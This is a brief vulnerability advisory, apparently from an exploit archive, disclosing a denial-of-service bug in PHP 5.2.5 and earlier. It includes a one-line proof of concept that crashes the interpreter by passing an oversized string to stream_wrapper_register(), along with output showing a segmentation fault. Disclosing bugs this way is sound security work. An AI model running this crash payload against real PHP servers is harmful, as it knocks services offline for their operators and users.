Application: PHP <= 5.2.5 Web Site: http://php.net Platform: unix Bug: Denial of service fonction: stream_wrapper_register() special condition: default php-memory-limit ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Greets 5) Credits =========== 1) Introduction =========== "PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML." ====== 2) Bug ====== stream_wrapper_register() is vulnerable to a denial of service ===== 3)Proof of concept ===== Proof of concept example : <?php stream_wrapper_register("hi",str_repeat("A",8477000));//let's make sure we trigger it ! ?> result: root@unsafebox:~/Desktop# php shot.php Erreur de segmentation (core dumped) root@unsafebox:~/Desktop# ======== 4)Greets ======== Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh ===== 5)Credits ===== laurent gaffié
